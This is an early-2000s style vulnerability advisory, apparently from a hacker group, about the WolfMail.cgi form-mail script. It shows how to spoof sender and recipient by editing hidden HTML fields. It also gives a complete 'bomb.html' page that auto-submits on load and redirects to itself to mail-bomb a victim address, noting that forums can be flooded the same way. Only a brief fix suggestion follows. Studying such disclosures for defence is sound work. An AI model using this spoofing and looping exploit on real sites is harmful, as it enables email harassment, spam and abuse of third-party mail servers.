*+-._\_.-+*
WolfMail.cgi 
*+-._/_.-+*

by Dead Beat
The Advanced Knowledge Network
http://www.advknowledge.net

Mailirritation possibillity
(fake and highfire an account)

Wolfmail is a script similar to formmail.cgi which allows users to send mails 
from the page without using their Mailclient. However I guess the developers didn't
want to make the script in the way that you configurate it in the actual script but
send all the variables to the script from the actuall execution file.

________
FAKING:

So as said most of the real configuration is done in the actual _.html file so for 
example the <input type="hidden" name="recipient" value="user@host.com"> 
is specified in the _.html file of the composer. You can easily download the site and 
change the code. If, for example you, want to fake a mail to: "fake@mailhost.com" you 
just have to change the value field. Other things like subject and cc can be defined
(read the installation papers to learn more)

For Example:

<input type="hidden" name="recipient" value="email@example.com">
<input type="hidden" name="subject" value="From your site...">

could be changed to:

<input type="text" name="recipient" value="spam@mail.com">
<input type="text" name="subject" value="Hi you">
<input type="text" name="abemail" value="fake@mail.com" size="17" maxlength="140">

that would allow you to self define those two values and send the mail from fake@mail.com to spam@mail.com. 

Just so that I don't get any mails of any users here that don't understand this:
When you download the html file to change all the stuff you have to set the path to where
formmail.php actually is so if you download it you will find a line like this:

<form action="scripts/formmail.php" method="POST" enctype="multipart/form-data">

If you downloaded from http://www.mailscriptuser.com/contact.html you have to change the upper line to:

<form action="http://www.mailscriptuser.com/scripts/formmail.php" method="POST" enctype="multipart/form-data">

Got that? Good next little security vuln. attackers could trip over is the kind of bombing an adress.


___________
HIGH FIRE

There is a variable called "redirect" this allows you to send the user to a site after the actual
mailing is done.(Something that tells you such as: "Thanks! Your mail was send" or whatever) this 
option looks like this

<input TYPE="HIDDEN" name="redirect" value="http://www.domain.com/contact/mail/thanks.htm">

Since the script itself doesn't check(log) your IP an 
attacker could download the html file, predefine all values(like message, subject, recipient,...) and then 
set a java-script that reloads the site and set the redirect url to the html with the predefined values this 
way a loop would run and send, send and send emails all over and over again.

EXAMPLE bomb.html:
<html>
<head>
<body onload="document.bomber.submit();">
<form name="bomber" method="POST" action="http://www.domain.com/contact/mail/wolfmail.cgi">
<input TYPE="text" name="required" value="adMail-Text|abemail">
<input TYPE="text" name="subject" value="Exploiting wolfmail.cgi">
<input TYPE="text" name="recipient" value="Victim@mail.com">
<input TYPE="text" name="redirect" value="C:\Exploit\bomb.html">
<input type="text" name="aaName" value="Wolfmail Exploiter" size="17" maxlength="140">
<input type="text" name="abemail" value="fake@mail.com" size="17" maxlength="140">
<textarea name="adMail-Text" rows="4" cols="13" wrap="virtual">Bombing text goes here</textarea>
<input type="submit" value="submit">
</body>
</head>
</html>

The upper script can of course be used on many forms, so other mailforms may be affected too. 
It is also possible to flood forums with such script! I hope you will re-configure and check 
out your forms and the actual scripts behind it for this vulnerabillity. If you have found 
another script that this trick works with mail me I will include them here and you will get 
a credit ofcourse!

SOLUTION
You should change the script or use another one so that the IP's you send from can only be used 
ONCE and let the email be predefined in a file or in the actual script.

I am quite sure that these aren't all of the bugs but I didn't really go into the code. This is 
just what I saw first. Thanks to b0iler and Ravish! Greetings out to StartX, Road^K|ll, Silver 
and all of my friends I forgot!

Truthfully,
Dead Beat, strebergarten@hotmail.com
The Advanced Knowledge Network
http://www.advknowledge.net

Want more, new, better BUGS and other Informations? Then visit us!
  

-- 
Best regards,
 Dead Beat                           
 The Advanced Knowledge Network
 http://www.advknowledge.net
 mailto:Dead_Beat@gmx.de